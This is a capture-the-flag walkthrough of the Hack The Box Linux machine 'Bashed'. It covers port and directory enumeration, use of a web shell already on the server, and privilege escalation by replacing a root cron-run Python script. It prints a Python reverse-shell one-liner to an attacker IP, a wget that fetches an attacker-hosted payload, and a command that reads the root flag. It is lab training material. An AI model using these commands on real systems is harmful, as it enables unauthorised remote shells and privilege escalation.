Bashed
OS: Linux, Difficult: Easy, IP: 10.10.10.68
Initial Enumeration
Nmap scan for all TCP ports
sudo nmap -T4 -p- -oN T-all 10.10.10.68
# Nmap 7.70 scan initiated Tue Jul 2 23:33:14 2019 as: nmap -T4 -p- -oN T-all 10.10.10.68
Nmap scan report for 10.10.10.68
Host is up (0.24s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE
80/tcp open http
# Nmap done at Tue Jul 2 23:44:27 2019 -- 1 IP address (1 host up) scanned in 672.99 seconds
Only 1 attack vector i.e. port 80 HTTP server.
sudo nmap -p 80 -sV -sC -oN O-Detailed 10.10.10.68
# Nmap 7.70 scan initiated Tue Jul 2 23:37:00 2019 as: nmap -p 80 -sV -sC -oN O-Detailed 10.10.10.68
Nmap scan report for 10.10.10.68
Host is up (0.23s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jul 2 23:37:12 2019 -- 1 IP address (1 host up) scanned in 12.61 seconds
No searchsploit results for the particular version of the Apache HTTPd Server.

Ran gobuster on the server to get a few directories to explore
gobuster dir -t 50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster-medium -u http://10.10.10.68
/uploads (Status: 301)
/images (Status: 301)
/php (Status: 301)
/css (Status: 301)
/dev (Status: 301)
/js (Status: 301)
/fonts (Status: 301)
Uploads
and Dev
seemed interesting. However, uploads
was empty.

phpbash.php
got us the web-shell already installed on the server with www-data
user.

User Own
> cat /home/arrexel/user.txt
2c281***
Root Own
Another thing to notice was user www-data
is able to run sudo
as scriptmanager
without a password and there's an interesting folder owned by scriptmanager
in the root directory.


sudo -u scriptmanager ls -la /scripts
total 16
drwxrwxr-- 2 scriptmanager scriptmanager 4096 Dec 4 2017 .
drwxr-xr-x 23 root root 4096 Dec 4 2017 ..
-rw-r--r-- 1 scriptmanager scriptmanager 58 Dec 4 2017 test.py
-rw-r--r-- 1 root root 12 Jul 4 02:44 test.txt [TIME CHANGED]
------------------------------
-rw-r--r-- 1 root root 12 Jul 4 03:03 test.txt [TIME CHANGED]
To run LinEnum.sh
I got a reverse shell from the existing web-shell. Using the python server I downloaded the LinEnum.sh
file onto the server and ran to see what all was interesting.
sudo -u scriptmanager python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.13",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' &
There was nothing too exciting in the output except the fact that there were some crontabs
registered for the user root
. As evident from the listings of the folder /scripts/ the text file was being generated every minute as stated above.
The code which was being run was test.py
f = open("test.txt", "w")
f.write("testing 123!")
f.close
As evident from the permissions, this file can be modified by the scriptmanager
user and hence can be used to our leverage.
Craft the following python script on the attacker system, transfer, and replace the file on the machine and wait for the output.
import os
cmd = "cat /root/root.txt > /tmp/root"
os.system(cmd)
sudo -u scriptmanager wget http://10.10.14.13:9999/script.py -O /scripts/test.py
After 1 minute we will have our root flag
in the /tmp/root
file.

> cat /tmp/root
cc4f0***
Learning outcome
Having a closer look at suspiciously owned root files, as these may give out important information, as in this case the change in time every minute was the clue to a root owned cron tab
.
Last updated
Was this helpful?